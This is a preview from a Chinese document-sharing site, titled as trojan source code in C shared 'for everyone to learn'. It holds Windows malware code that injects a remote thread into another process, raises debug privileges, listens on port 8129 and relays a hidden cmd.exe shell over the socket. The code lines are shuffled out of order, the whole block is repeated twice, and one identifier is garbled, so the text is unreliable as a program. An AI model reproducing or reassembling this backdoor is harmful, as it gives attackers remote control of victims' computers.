网上看到的一个用C语言编写的木马源程序代码大家一起学学
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
FARPROC Pclosቤተ መጻሕፍቲ ባይዱsocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
PMessageBoxA = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
}
}
PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
memset(Para->Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
if(lBytesRead) {
if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
// Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;
PCloseHandle(hWritePipe1);
Pclosesocket(listenSocket);
Pclosesocket(clientSocket);
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
HANDLE hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead = 0;
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
if(Plisten(listenSocket, 5))return 0;
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;
LoadLibraryFunc(Para->winsockDll);
PCreateProcessA = (FARPROC)Para->dwCreateProcessA;
PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;
PWriteFile = (FARPROC)Para->dwWriteFile;
PReadFile = (FARPROC)Para->dwReadFile;
if(listenSocket == INVALID_SOCKET)return 0;
server_addr.sin_family = AF_INET;
server_addr.sin_port = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;
DWORD dwGetModuleHandle;
DWORD dwWSAStartup;
DWORD dwSocket;
DWORD dwhtons;
DWORD dwbind;
DWORD dwlisten;
DWORD dwaccept;
DWORD dwsend;
Plisten = (FARPROC)Para->dwlisten;
Paccept = (FARPROC)Para->dwaccept;
Psend = (FARPROC)Para->dwsend;
Precv = (FARPROC)Para->dwrecv;
Pclosesocket = (FARPROC)Para->dwclosesocket;
FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
char telnetmsg[60];
}RemotePara;
// 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
// 根据进程名称得到进程ID
DWORD GetPidByName(char *szName);
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
//参数结构 ;
typedef struct _RemotePara
{
DWORD dwLoadLibrary;
DWORD dwFreeLibrary;
DWORD dwGetProcAddress;
ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
PCloseHandle = (FARPROC)Para->dwCloseHandle;
PCreatePipe = (FARPROC)Para->dwCreatePipe;
PTerminateProcess = (FARPROC)Para->dwTerminateProcess;
si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
while(1) {
{
const DWORD THREADSIZE=1024*4;
DWORD byte_write;
void *pRemoteThread;
HANDLE hToken,hRemoteProcess,hThread;
HINSTANCE hKernel,hUser32,hSock;
RemotePara myRemotePara,*pRemotePara;
DWORD dwCreatePipe;
DWORD dwTerminateProcess;
DWORD dwMessageBox;
char strMessageBox[12];
char winsockDll[16];
char cmd[10];
char Buff[4096];
PWSAStartup = (FARPROC)Para->dwWSAStartup;
PSocket = (FARPROC)Para->dwSocket;
Phtons = (FARPROC)Para->dwhtons;
Pbind = (FARPROC)Para->dwbind;
DWORD dwrecv;
DWORD dwclosesocket;
DWORD dwCreateProcessA;
DWORD dwPeekNamedPipe;
DWORD dwWriteFile;
DWORD dwReadFile;
DWORD dwCloseHandle;
以下是在网上看到的一个用C语言编写的木马源程序代码大家一起学学
#include<winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#include<windows.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
}else {
lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
if(lBytesRead <=0 ) break;
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
PMessageBoxA = (FARPROC)Para->dwMessageBox;
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
}
}
PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
memset(Para->Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
if(lBytesRead) {
if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
// Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;
PCloseHandle(hWritePipe1);
Pclosesocket(listenSocket);
Pclosesocket(clientSocket);
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
HANDLE hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead = 0;
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
if(Plisten(listenSocket, 5))return 0;
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;
LoadLibraryFunc(Para->winsockDll);
PCreateProcessA = (FARPROC)Para->dwCreateProcessA;
PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;
PWriteFile = (FARPROC)Para->dwWriteFile;
PReadFile = (FARPROC)Para->dwReadFile;
if(listenSocket == INVALID_SOCKET)return 0;
server_addr.sin_family = AF_INET;
server_addr.sin_port = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;
DWORD dwGetModuleHandle;
DWORD dwWSAStartup;
DWORD dwSocket;
DWORD dwhtons;
DWORD dwbind;
DWORD dwlisten;
DWORD dwaccept;
DWORD dwsend;
Plisten = (FARPROC)Para->dwlisten;
Paccept = (FARPROC)Para->dwaccept;
Psend = (FARPROC)Para->dwsend;
Precv = (FARPROC)Para->dwrecv;
Pclosesocket = (FARPROC)Para->dwclosesocket;
FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
char telnetmsg[60];
}RemotePara;
// 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
// 根据进程名称得到进程ID
DWORD GetPidByName(char *szName);
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
//参数结构 ;
typedef struct _RemotePara
{
DWORD dwLoadLibrary;
DWORD dwFreeLibrary;
DWORD dwGetProcAddress;
ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数,可以直接调用
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
PCloseHandle = (FARPROC)Para->dwCloseHandle;
PCreatePipe = (FARPROC)Para->dwCreatePipe;
PTerminateProcess = (FARPROC)Para->dwTerminateProcess;
si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
while(1) {
{
const DWORD THREADSIZE=1024*4;
DWORD byte_write;
void *pRemoteThread;
HANDLE hToken,hRemoteProcess,hThread;
HINSTANCE hKernel,hUser32,hSock;
RemotePara myRemotePara,*pRemotePara;
DWORD dwCreatePipe;
DWORD dwTerminateProcess;
DWORD dwMessageBox;
char strMessageBox[12];
char winsockDll[16];
char cmd[10];
char Buff[4096];
PWSAStartup = (FARPROC)Para->dwWSAStartup;
PSocket = (FARPROC)Para->dwSocket;
Phtons = (FARPROC)Para->dwhtons;
Pbind = (FARPROC)Para->dwbind;
DWORD dwrecv;
DWORD dwclosesocket;
DWORD dwCreateProcessA;
DWORD dwPeekNamedPipe;
DWORD dwWriteFile;
DWORD dwReadFile;
DWORD dwCloseHandle;
以下是在网上看到的一个用C语言编写的木马源程序代码大家一起学学
#include<winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#include<windows.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
}else {
lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
if(lBytesRead <=0 ) break;
return 0;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)